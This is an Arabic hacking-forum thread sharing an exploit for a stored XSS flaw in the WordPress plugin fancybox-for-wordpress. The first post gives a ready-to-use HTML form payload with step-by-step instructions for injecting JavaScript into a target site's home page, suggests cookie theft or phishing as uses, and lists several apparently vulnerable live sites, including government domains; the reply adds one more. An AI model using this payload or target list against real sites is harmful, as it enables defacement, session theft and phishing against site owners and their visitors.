fancybox-for-wordpress

fancybox-for-wordpress


النتائج 1 إلى 2 من 2

الموضوع: fancybox-for-wordpress

  1. #1

    Newnews fancybox-for-wordpress

    السلام عليكم

    قبل ايام تم اكتشاف ثغرة في الاضافة

    fancybox-for-wordpress

    وهي اضافة مشهورة ومواقع كثيرة تستخدمها

    وحسب موقع wordpress.org فانه تم تحميل 600 الف نسخة منها

    يعني آلاف المواقع مصابة

    المهم الثغرة هي عبارة عن Stored XSS وتسمح لك باضافة اكواد html وجافاسكريبت الى الصفحة الرئيسية في الموقع..

    الاستغلال:
    كود HTML:
    <form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
        <input type="text" name="action" value="update">
        <input type="text" name="mfbfw[padding]" value="</استبدال script><استبدال script>alert(/Owned by someone/)</استبدال script>">
        <input type="submit" value="Send">
    </form>
    نقوم بتغيير الايبي الى رابط الموقع المصاب
    نستبدل Owned by someone الى اسمك مثلا:GOSTEDZ
    نفتح مستند نص ننسخ الكود ونحط الكود في المستند ونحفظه بصيغة HTML
    وبعد الاستغلال يتم تنفيذ كود الجافاسكريبت على كل زوار الموقع

    وطبعا كل واحد وكيف يتسغل هذه الثغرة مثلا في سرقة الكوكيز او phishing ...الخ

    مواقع مصابة:
    كود:
    http://foreverafter.co.il
    http://unfolding.co.il
    http://www.cws.co.il
    http://www.para-dox.co.il
    http://www.hotelsblog.co.il
    http://www.taal.gov.ph
    http://diariodeviaje.pakapaka.gob.ar 
    http://loko.pz.gov.ua
    * الثغرة ليست من اكتشافي وايضا هي ليست منشورة في مواقع الحماية والكثير لا يعلم عنها...
    الثغرة : http://1337day.com/exploit/23294 ====> 16/02/2015
    التعديل الأخير تم بواسطة hacker@dz ; 02-19-2015 الساعة 01:23 PM
    من خبرتي .......

    1-لا اختراق أبدا قبل الحماية
    2-ان لم تتعلم التشفير فأنت لست هكر
    3-لا اختراق بامتداد صورة الا بثغرة نظام
    4-ضروري تعلم اكتشاف واستغلال الثغرات
    5-لابد من وجود شيئ برايفت لك
    6-يستحيل أن تعرف كل شيئ في الاختراق
    7-يستحيل أن تدخل الهكر ولا يخترق جهازك
    8-يستحيل أن تنام من غير ما تفكر في الهكر
    9-يستحيل أن يطرح سيرفر و يظل مشفر أكثر من 24 ساعة
    10-يستحيل أن نرى عالم الهكرمن دون ملغمين
    GOSTE DZ

  2. #2

    افتراضي رد: fancybox-for-wordpress

    www.cehat.asso.fr

    - - - تم التحديث - - -

    1-لا اختراق أبدا قبل الحماية

المواضيع المتشابهه

  1. ثغرة Wordpress 2013
    بواسطة rakan-2011 في المنتدى قسم الثغرات
    مشاركات: 17
    آخر مشاركة: 07-01-2013, 08:53 PM
  2. أداة تخمين wordpress
    بواسطة Iraqe Hacker في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 0
    آخر مشاركة: 01-21-2013, 10:31 PM
  3. مشكلة في موقع مركب 3.4.1 WordPress
    بواسطة t-72 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 08-31-2012, 11:08 PM
  4. Wordpress themes (Londonlive)====> RFI & LFI
    بواسطة Ace في المنتدى قسم الثغرات
    مشاركات: 4
    آخر مشاركة: 05-15-2012, 02:50 PM
  5. شرح تركيب المدونة الشخصية WordPress-2.8.4
    بواسطة ASDELY-ScOrPiOn في المنتدى تطوير المواقع والمنتديات
    مشاركات: 3
    آخر مشاركة: 09-15-2009, 12:13 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •